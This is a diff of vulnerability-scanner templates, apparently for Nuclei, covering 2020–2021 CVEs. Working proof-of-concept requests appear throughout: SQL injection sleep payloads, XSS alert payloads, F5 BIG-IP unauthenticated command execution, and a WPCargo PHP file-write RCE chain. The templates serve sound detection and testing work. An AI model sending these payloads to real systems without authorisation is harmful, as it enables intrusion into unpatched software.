@ -1,7 +1,7 @@
|
|||
id: CVE-2020-10546
|
||||
|
||||
info:
|
||||
name: rConfig 3.9.4 SQL Injection
|
||||
name: rConfig 3.9.4 - SQL Injection
|
||||
author: madrobot
|
||||
severity: critical
|
||||
description: rConfig 3.9.4 and previous versions have unauthenticated compliancepolicies.inc.php SQL injection. Because nodes' passwords are stored in cleartext by default, this vulnerability leads to lateral movement,
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2020-10547
|
||||
|
||||
info:
|
||||
name: rConfig 3.9.4 SQL Injection
|
||||
name: rConfig 3.9.4 - SQL Injection
|
||||
author: madrobot
|
||||
severity: critical
|
||||
description: rConfig 3.9.4 and previous versions has unauthenticated compliancepolicyelements.inc.php SQL injection. Because nodes' passwords are stored by default in cleartext, this vulnerability leads to lateral movement, granting an attacker access to monitored network devices.
|
||||
|
|
|
@ -7,9 +7,10 @@ info:
|
|||
description: Grafana through 6.7.1 contains an unauthenticated stored cross-site scripting vulnerability due to insufficient input protection in the originalUrl field, which allows an attacker to inject JavaScript code that will be executed after clicking on Open Original Dashboard after visiting the snapshot.
|
||||
reference:
|
||||
- https://web.archive.org/web/20210717142945/https://ctf-writeup.revers3c.com/challenges/web/CVE-2020-11110/index.html
|
||||
- https://github.com/grafana/grafana/blob/master/CHANGELOG.md
|
||||
- https://github.com/grafana/grafana/pull/23254
|
||||
- https://security.netapp.com/advisory/ntap-20200810-0002/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-11110
|
||||
- https://hackerone.com/reports/1329433
|
||||
remediation: This issue can be resolved by updating Grafana to the latest version.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2020-11991
|
||||
|
||||
info:
|
||||
name: Apache Cocoon 2.1.12 XML Injection
|
||||
name: Apache Cocoon 2.1.12 - XML Injection
|
||||
author: pikpikcu
|
||||
severity: high
|
||||
description: Apache Cocoon 2.1.12 is susceptible to XML injection. When using the StreamGenerator, the code parses a user-provided XML. A specially crafted XML, including external system entities, can be used to access any file on the server system.
|
||||
|
|
|
@ -0,0 +1,34 @@
|
|||
id: CVE-2020-13121
|
||||
|
||||
info:
|
||||
name: Submitty 20.04.01 - Open redirect
|
||||
author: 0x_Akoko
|
||||
severity: medium
|
||||
description: Submitty through 20.04.01 has an open redirect via authentication/login?old= during an invalid login attempt.
|
||||
reference:
|
||||
- https://github.com/Submitty/Submitty/issues/5265
|
||||
- https://www.cvedetails.com/cve/CVE-2020-13121
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.10
|
||||
cve-id: CVE-2020-13121
|
||||
cwe-id: CWE-601
|
||||
tags: cve,cve2020,redirect,submitty,oos
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /authentication/check_login?old=http%253A%252F%252Fexample.com%252Fhome HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Origin: {{RootURL}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Referer: {{RootURL}}/authentication/login
|
||||
|
||||
user_id={{username}}&password={{password}}&stay_logged_in=on&login=Login
|
||||
|
||||
cookie-reuse: true
|
||||
matchers:
|
||||
- type: regex
|
||||
part: header
|
||||
regex:
|
||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2020-13937
|
||||
|
||||
info:
|
||||
name: Apache Kylin Exposed Configuration File
|
||||
name: Apache Kylin - Exposed Configuration File
|
||||
author: pikpikcu
|
||||
severity: medium
|
||||
description: Apache Kylin 2.0.0, 2.1.0, 2.2.0, 2.3.0, 2.3.1, 2.3.2, 2.4.0, 2.4.1, 2.5.0, 2.5.1, 2.5.2, 2.6.0, 2.6.1, 2.6.2, 2.6.3, 2.6.4, 2.6.5, 2.6.6, 3.0.0-alpha, 3.0.0-alpha2, 3.0.0-beta, 3.0.0, 3.0.1, 3.0.2, 3.1.0, 4.0.0-alpha have one REST API which exposed Kylin's configuration information without authentication.
|
||||
|
|
|
@ -15,7 +15,7 @@ info:
|
|||
- https://nvd.nist.gov/vuln/detail/CVE-2020-14408
|
||||
metadata:
|
||||
verified: true
|
||||
tags: cve,cve2022,cockpit,agentejo,xss,oss
|
||||
tags: cve,cve2020,cockpit,agentejo,xss,oss
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
|
|
|
@ -7,9 +7,9 @@ info:
|
|||
description: |
|
||||
Gridx 1.3 is susceptible to remote code execution via tests/support/stores/test_grid_filter.php, which allows remote attackers to execute arbitrary code via crafted values submitted to the $query parameter.
|
||||
reference:
|
||||
- http://mayoterry.com/file/cve/Remote_Code_Execution_Vulnerability_in_gridx_latest_version.pdf
|
||||
- https://github.com/oria/gridx/issues/433
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-19625
|
||||
- http://mayoterry.com/file/cve/Remote_Code_Execution_Vulnerability_in_gridx_latest_version.pdf
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
|
@ -19,23 +19,18 @@ info:
|
|||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/tests/support/stores/test_grid_filter.php?query=phpinfo();"
|
||||
- "{{BaseURL}}/tests/support/stores/test_grid_filter.php?query=echo%20md5%28%22CVE-2020-19625%22%29%3B"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "6ca86c2c17047c14437f55c42c801c10"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- "PHP Extension"
|
||||
- "PHP Version"
|
||||
condition: and
|
||||
extractors:
|
||||
- type: regex
|
||||
part: body
|
||||
group: 1
|
||||
regex:
|
||||
- '<h1 class=\"p\">PHP Version ([0-9.]+)<\/h1>'
|
||||
|
||||
# Enhanced by mp on 2022/04/27
|
||||
|
|
|
@ -0,0 +1,39 @@
|
|||
id: CVE-2020-21012
|
||||
|
||||
info:
|
||||
name: Sourcecodester Hotel and Lodge Management System 2.0 - SQL Injection
|
||||
author: edoardottt
|
||||
severity: critical
|
||||
description: |
|
||||
Sourcecodester Hotel and Lodge Management System 2.0 contains a SQL injection vulnerability via the email parameter to the edit page for Customer, Room, Currency, Room Booking Details, or Tax Details. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
|
||||
reference:
|
||||
- https://github.com/hitIer/web_test/tree/master/hotel
|
||||
- https://www.sourcecodester.com/php/13707/hotel-and-lodge-management-system.html
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-21012
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2020-21012
|
||||
cwe-id: CWE-89
|
||||
metadata:
|
||||
verified: "true"
|
||||
tags: cve,cve2020,hotel,sqli,unauth
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /forgot_password.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
btn_forgot=1&email=1%27%20or%20sleep(6)%23
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'duration>=6'
|
||||
- 'status_code == 200'
|
||||
- 'contains(body, "Hotel Booking System")'
|
||||
condition: and
|
||||
|
||||
# Enhanced by md on 2022/12/08
|
|
@ -0,0 +1,48 @@
|
|||
id: CVE-2020-24902
|
||||
|
||||
info:
|
||||
name: Quixplorer <=2.4.1 - Cross-Site Scripting
|
||||
author: edoardottt
|
||||
severity: medium
|
||||
description: |
|
||||
Quixplorer through 2.4.1 contains a cross-site scripting vulnerability. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
|
||||
reference:
|
||||
- https://dl.packetstormsecurity.net/1804-exploits/quixplorer241beta-xss.txt
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-24902
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
cve-id: CVE-2020-24902
|
||||
cwe-id: CWE-79
|
||||
metadata:
|
||||
google-dork: intitle:"My Download Server"
|
||||
shodan-query: http.title:"My Download Server"
|
||||
verified: "true"
|
||||
tags: cve,cve2020,quixplorer,xss
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/index.php?action=post&order=bszop%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
|
||||
host-redirects: true
|
||||
max-redirects: 2
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "<script>alert(document.domain)</script>&srt=yes"
|
||||
- "My Download"
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by md on 2022/12/08
|
|
@ -0,0 +1,45 @@
|
|||
id: CVE-2020-24903
|
||||
|
||||
info:
|
||||
name: Cute Editor for ASP.NET 6.4 - Cross-Site Scripting
|
||||
author: edoardottt
|
||||
severity: medium
|
||||
description: |
|
||||
Cute Editor for ASP.NET 6.4 contains a cross-site scripting vulnerability. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
|
||||
reference:
|
||||
- https://seclists.org/bugtraq/2016/Mar/104
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-24903
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
cve-id: CVE-2020-24903
|
||||
cwe-id: CWE-79
|
||||
metadata:
|
||||
shodan-query: http.component:"ASP.NET"
|
||||
verified: "true"
|
||||
tags: cve,cve2020,cuteeditor,xss,seclists
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/CuteSoft_Client/CuteEditor/Template.aspx?Referrer=XSS";><script>alert(document.domain)</script>'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "<script>alert(document.domain)</script></p>"
|
||||
- "System.Web"
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by md on 2022/12/08
|
|
@ -4,7 +4,7 @@ id: CVE-2020-25213
|
|||
# http://localhost/wp-content/plugins/wp-file-manager/lib/files/poc.txt
|
||||
|
||||
info:
|
||||
name: WordPress File Manager Plugin Remote Code Execution
|
||||
name: WordPress File Manager Plugin - Remote Code Execution
|
||||
author: foulenzer
|
||||
severity: critical
|
||||
description: The WordPress File Manager plugin prior to version 6.9 is susceptible to remote code execution. The vulnerability allows unauthenticated remote attackers to upload .php files.
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2020-25223
|
||||
|
||||
info:
|
||||
name: Sophos UTM Preauth Remote Code Execution
|
||||
name: Sophos UTM Preauth - Remote Code Execution
|
||||
author: gy741
|
||||
severity: critical
|
||||
description: Sophos SG UTMA WebAdmin is susceptible to a remote code execution vulnerability in versions before v9.705 MR5, v9.607 MR7, and v9.511 MR11.
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2020-25506
|
||||
|
||||
info:
|
||||
name: D-Link DNS-320 Unauthenticated Remote Code Execution
|
||||
name: D-Link DNS-320 - Unauthenticated Remote Code Execution
|
||||
author: gy741
|
||||
severity: critical
|
||||
description: D-Link DNS-320 FW v2.06B01 Revision Ax is susceptible to a command injection vulnerability in a system_mgr.cgi component. The component does not successfully sanitize the value of the HTTP parameters f_ntp_server, which in turn leads to arbitrary command execution.
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2020-2551
|
||||
|
||||
info:
|
||||
name: Oracle WebLogic Server Remote Code Execution
|
||||
name: Oracle WebLogic Server - Remote Code Execution
|
||||
author: dwisiswant0
|
||||
severity: critical
|
||||
description: |
|
||||
|
|
|
@ -0,0 +1,40 @@
|
|||
id: CVE-2020-26248
|
||||
|
||||
info:
|
||||
name: PrestaShop Product Comments <4.2.0 - SQL Injection
|
||||
author: edoardottt
|
||||
severity: high
|
||||
description: |
|
||||
PrestaShop Product Comments module before version 4.2.1 contains a SQL injection vulnerability, An attacker can use a blind SQL injection to retrieve data or stop the MySQL service, thereby possibly obtaining sensitive information, modifying data, and/or executing unauthorized administrative operations in the context of the affected site.
|
||||
reference:
|
||||
- https://packetstormsecurity.com/files/160539/PrestaShop-ProductComments-4.2.0-SQL-Injection.html
|
||||
- https://packagist.org/packages/prestashop/productcomments
|
||||
- https://github.com/PrestaShop/productcomments/security/advisories/GHSA-5v44-7647-xfw9
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-26248
|
||||
remediation: Fixed in 4.2.1.
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H
|
||||
cvss-score: 8.2
|
||||
cve-id: CVE-2020-26248
|
||||
cwe-id: CWE-89
|
||||
metadata:
|
||||
verified: "true"
|
||||
tags: cve,cve2020,sqli,prestshop,packetstorm
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
@timeout: 20s
|
||||
GET /index.php?fc=module&module=productcomments&controller=CommentGrade&id_products%5B%5D=(select*from(select(sleep(6)))a) HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'duration>=6'
|
||||
- 'status_code == 200'
|
||||
- 'contains(content_type, "application/json")'
|
||||
- 'contains(body, "average_grade")'
|
||||
condition: and
|
||||
|
||||
# Enhanced by md on 2022/12/08
|
|
@ -0,0 +1,45 @@
|
|||
id: CVE-2020-29284
|
||||
|
||||
info:
|
||||
name: Sourcecodester Multi Restaurant Table Reservation System 1.0 - SQL Injection
|
||||
author: edoardottt
|
||||
severity: critical
|
||||
description: |
|
||||
Sourcecodester Multi Restaurant Table Reservation System 1.0 contains a SQL injection vulnerability via the file view-chair-list.php. It does not perform input validation on the table_id parameter, which allows unauthenticated SQL injection. An attacker can send malicious input in the GET request to /dashboard/view-chair-list.php?table_id= to trigger the vulnerability.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/48984
|
||||
- https://www.sourcecodester.com/sites/default/files/download/janobe/tablereservation.zip
|
||||
- https://github.com/BigTiger2020/-Multi-Restaurant-Table-Reservation-System/blob/main/README.md
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-29284
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2020-29284
|
||||
cwe-id: CWE-89
|
||||
metadata:
|
||||
verified: "true"
|
||||
tags: cve2020,tablereservation,sqli,unauth,edb,cve
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/dashboard/view-chair-list.php?table_id='+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+-"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'duration>=6'
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "Restaurent Tables"
|
||||
- "Chair List"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by md on 2022/12/08
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2020-35846
|
||||
|
||||
info:
|
||||
name: Agentejo Cockpit < 0.11.2 NoSQL Injection
|
||||
name: Agentejo Cockpit < 0.11.2 - NoSQL Injection
|
||||
author: dwisiswant0
|
||||
severity: critical
|
||||
description: Agentejo Cockpit before 0.11.2 allows NoSQL injection via the Controller/Auth.php check function. The $eq operator matches documents where the value of a field equals the specified value.
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2020-35847
|
||||
|
||||
info:
|
||||
name: Agentejo Cockpit <0.11.2 NoSQL Injection
|
||||
name: Agentejo Cockpit <0.11.2 - NoSQL Injection
|
||||
author: dwisiswant0
|
||||
severity: critical
|
||||
description: Agentejo Cockpit before 0.11.2 allows NoSQL injection via the Controller/Auth.php resetpassword function of the Auth controller.
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2021-20114
|
||||
|
||||
info:
|
||||
name: TCExam <= 14.8.1 Sensitive Information Exposure
|
||||
name: TCExam <= 14.8.1 - Sensitive Information Exposure
|
||||
author: push4d
|
||||
severity: high
|
||||
description: When installed following the default/recommended settings, TCExam <= 14.8.1 allowed unauthenticated users to access the /cache/backup/ directory, which includes sensitive database backup files.
|
||||
|
|
|
@ -0,0 +1,54 @@
|
|||
id: CVE-2021-20323
|
||||
|
||||
info:
|
||||
name: Keycloak < 18.0.0 - Cross Site Scripting
|
||||
author: ndmalc
|
||||
severity: medium
|
||||
description: |
|
||||
Keycloak before 18.0.0 and after 10.0.0 allows a reflected XSS on client-registrations endpoint. On POST request, when a request is submitted, the application does not sanitize unknown attribute name before including it in the error response with a 'Content-Type' of text/hml. Once reflected, the response is interpreted as html. This can be performed on any realm present on the Keycloak instance. Currently, due to the bug requiring Content-Type application/json and is submitted via a POST, there is no common path to exploit that have a user impact.
|
||||
reference:
|
||||
- https://github.com/keycloak/keycloak/security/advisories/GHSA-m98g-63qj-fp8j
|
||||
- https://bugzilla.redhat.com/show_bug.cgi?id=2013577
|
||||
- https://access.redhat.com/security/cve/CVE-2021-20323
|
||||
- https://github.com/ndmalc/CVE-2021-20323
|
||||
- https://github.com/keycloak/keycloak/commit/3aa3db16eac9b9ed8c5335ac86f5f50e0c68662d
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-20323
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 6.1
|
||||
cve-id: CVE-2021-20323
|
||||
cwe-id: CWE-79
|
||||
metadata:
|
||||
shodan-query: html:"Keycloak"
|
||||
verified: "true"
|
||||
tags: cve,cve2021,keycloak,xss
|
||||
|
||||
requests:
|
||||
- method: POST
|
||||
path:
|
||||
- "{{BaseURL}}/auth/realms/master/clients-registrations/default"
|
||||
- "{{BaseURL}}/auth/realms/master/clients-registrations/openid-connect"
|
||||
- "{{BaseURL}}/realms/master/clients-registrations/default"
|
||||
- "{{BaseURL}}/realms/master/clients-registrations/openid-connect"
|
||||
|
||||
headers:
|
||||
Content-Type: application/json
|
||||
|
||||
body: "{\"Test<img src=x onerror=alert(document.domain)>\":1}"
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'Unrecognized field "Test<img src=x onerror=alert(document.domain)>'
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 400
|
|
@ -1,19 +1,18 @@
|
|||
id: CVE-2021-22986
|
||||
|
||||
info:
|
||||
name: F5 BIG-IP iControl REST - Remote Command Execution
|
||||
name: F5 BIG-IP iControl REST unauthenticated RCE
|
||||
author: rootxharsh,iamnoooob
|
||||
severity: critical
|
||||
description: F5 BIG-IP iControl REST interface is susceptible to an unauthenticated remote command execution vulnerability.
|
||||
description: The iControl REST interface has an unauthenticated remote command execution vulnerability.
|
||||
reference:
|
||||
- https://attackerkb.com/topics/J6pWeg5saG/k03009991-icontrol-rest-unauthenticated-remote-command-execution-vulnerability-cve-2021-22986
|
||||
- https://support.f5.com/csp/article/K03009991
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22986
|
||||
- http://packetstormsecurity.com/files/162059/F5-iControl-Server-Side-Request-Forgery-Remote-Command-Execution.html
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2021-22986
|
||||
tags: bigip,cve,cve2021,rce,mirai,kev
|
||||
tags: bigip,cve,cve2021,rce,kev,packetstorm
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
|
@ -24,6 +23,7 @@ requests:
|
|||
Authorization: Basic YWRtaW46
|
||||
Content-Type: application/json
|
||||
Cookie: BIGIPAuthCookie=1234
|
||||
Connection: close
|
||||
|
||||
{"username":"admin","userReference":{},"loginReference":{"link":"http://localhost/mgmt/shared/gossip"}}
|
||||
- |
|
||||
|
@ -32,6 +32,7 @@ requests:
|
|||
Accept-Language: en
|
||||
X-F5-Auth-Token: {{token}}
|
||||
Content-Type: application/json
|
||||
Connection: close
|
||||
|
||||
{"command":"run","utilCmdArgs":"-c id"}
|
||||
|
||||
|
@ -43,7 +44,6 @@ requests:
|
|||
group: 1
|
||||
regex:
|
||||
- "([A-Z0-9]{26})"
|
||||
|
||||
- type: regex
|
||||
part: body
|
||||
group: 1
|
||||
|
@ -56,5 +56,3 @@ requests:
|
|||
- "commandResult"
|
||||
- "uid="
|
||||
condition: and
|
||||
|
||||
# Enhanced by mp on 2022/05/05
|
||||
|
|
|
@ -0,0 +1,37 @@
|
|||
id: CVE-2021-24827
|
||||
|
||||
info:
|
||||
name: Asgaros Forum < 1.15.13 - Unauthenticated SQL Injection
|
||||
author: theamanrawat
|
||||
severity: critical
|
||||
description: |
|
||||
The Asgaros Forum WordPress plugin before 1.15.13 does not validate and escape user input when subscribing to a topic before using it in a SQL statement, leading to an unauthenticated SQL injection issue.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/36cc5151-1d5e-4874-bcec-3b6326235db1
|
||||
- https://wordpress.org/plugins/asgaros-forum/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-24827
|
||||
- https://plugins.trac.wordpress.org/changeset/2611560/asgaros-forum
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2021-24827
|
||||
cwe-id: CWE-89
|
||||
metadata:
|
||||
verified: "true"
|
||||
tags: cve2022,wp-plugin,asgaros-forum,unauth,wpscan,cve,wordpress,wp,sqli
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
@timeout: 15s
|
||||
GET /forum/?subscribe_topic=1%20union%20select%201%20and%20sleep(6) HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'duration>=6'
|
||||
- 'status_code == 200'
|
||||
- 'contains(content_type, "text/html")'
|
||||
- 'contains(body, "asgarosforum")'
|
||||
condition: and
|
|
@ -18,7 +18,7 @@ info:
|
|||
tags: wordpress,guppy,api,cve2021,cve,wp-plugin,edb,wpscan
|
||||
|
||||
requests:
|
||||
- method:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/wp-json/guppy/v2/load-guppy-users?userId=1&offset=0&search="
|
||||
|
||||
|
|
|
@ -0,0 +1,51 @@
|
|||
id: CVE-2021-25003
|
||||
|
||||
info:
|
||||
name: WPCargo < 6.9.0 - Unauthenticated Remote Code Execution
|
||||
author: theamanrawat
|
||||
severity: critical
|
||||
description: |
|
||||
The WPCargo Track & Trace WordPress plugin before 6.9.0 contains a file which could allow unauthenticated attackers to write a PHP file anywhere on the web server, leading to RCE.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/5c21ad35-b2fb-4a51-858f-8ffff685de4a
|
||||
- https://wordpress.org/plugins/wpcargo/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-25003
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2021-25003
|
||||
cwe-id: CWE-434
|
||||
metadata:
|
||||
verified: "true"
|
||||
tags: rce,wpcargo,unauth,cve,cve2021,wordpress,wp,wp-plugin,wpscan
|
||||
|
||||
variables:
|
||||
num: "999999999"
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET /wp-content/plugins/wpcargo/includes/{{randstr}}.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
- |
|
||||
GET /wp-content/plugins/wpcargo/includes/barcode.php?text=x1x1111x1xx1xx111xx11111xx1x111x1x1x1xxx11x1111xx1x11xxxx1xx1xxxxx1x1x1xx1x1x11xx1xxxx1x11xx111xxx1xx1xx1x1x1xxx11x1111xxx1xxx1xx1x111xxx1x1xx1xxx1x1x1xx1x1x11xxx11xx1x11xx111xx1xxx1xx11x1x11x11x1111x1x11111x1x1xxxx&sizefactor=.090909090909&size=1&filepath={{randstr}}.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
- |
|
||||
POST /wp-content/plugins/wpcargo/includes/{{randstr}}.php?1=var_dump HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
2={{md5(num)}}
|
||||
|
||||
req-condition: true
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- "status_code_1 != 200"
|
||||
- "status_code_2 == 200"
|
||||
- "status_code_3 == 200"
|
||||
- "contains(body_3, md5(num))"
|
||||
- "contains(body_3, 'PNG')"
|
||||
condition: and
|
|
@ -0,0 +1,35 @@
|
|||
id: CVE-2021-25099
|
||||
|
||||
info:
|
||||
name: Give < 2.17.3 - Cross-Site Scripting
|
||||
author: theamanrawat
|
||||
severity: medium
|
||||
description: |
|
||||
The GiveWP WordPress plugin before 2.17.3 does not sanitise and escape the form_id parameter before outputting it back in the response of an unauthenticated request via the give_checkout_login AJAX action, leading to a Reflected Cross-Site Scripting.
|
||||
reference:
|
||||
- https://wpscan.com/vulnerability/87a64b27-23a3-40f5-a3d8-0650975fee6f
|
||||
- https://wordpress.org/plugins/give/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-25099
|
||||
classification:
|
||||
cve-id: CVE-2021-25099
|
||||
metadata:
|
||||
verified: true
|
||||
tags: cve,cve2021,wordpress,wp-plugin,wp,xss,give,unauth
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /wp-admin/admin-ajax.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||||
|
||||
action=give_checkout_login&form_id=xxxxxx"><script>alert(document.domain)</script>
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'status_code == 200'
|
||||
- 'contains(content_type, "text/html")'
|
||||
- 'contains(body, "<script>alert(document.domain)</script>")'
|
||||
- 'contains(body, "give_user_login")'
|
||||
condition: and
|
|
@ -0,0 +1,37 @@
|
|||
id: CVE-2021-3110
|
||||
|
||||
info:
|
||||
name: PrestaShop 1.7.7.0 - SQL Injection
|
||||
author: Jaimin Gondaliya
|
||||
severity: critical
|
||||
description: |
|
||||
PrestaShop 1.7.7.0 contains a SQL injection vulnerability via the store system. It allows time-based boolean SQL injection via the module=productcomments controller=CommentGrade id_products[] parameter. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
|
||||
reference:
|
||||
- https://medium.com/@gondaliyajaimin797/cve-2021-3110-75a24943ca5e
|
||||
- https://www.exploit-db.com/exploits/49410
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-3110
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2021-3110
|
||||
cwe-id: CWE-89
|
||||
metadata:
|
||||
verified: "true"
|
||||
tags: cve,cve2021,sqli,prestshop,edb
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
@timeout: 20s
|
||||
GET /index.php?fc=module&module=productcomments&controller=CommentGrade&id_products[]=1%20AND%20(SELECT%203875%20FROM%20(SELECT(SLEEP(6)))xoOt) HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'duration>=6'
|
||||
- 'status_code == 200'
|
||||
- 'contains(content_type, "application/json")'
|
||||
- 'contains(body, "average_grade")'
|
||||
condition: and
|
||||
|
||||
# Enhanced by md on 2022/12/08
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2021-31682
|
||||
|
||||
info:
|
||||
name: WebCTRL OEM <= 6.5 Cross-Site Scripting
|
||||
name: WebCTRL OEM <= 6.5 - Cross-Site Scripting
|
||||
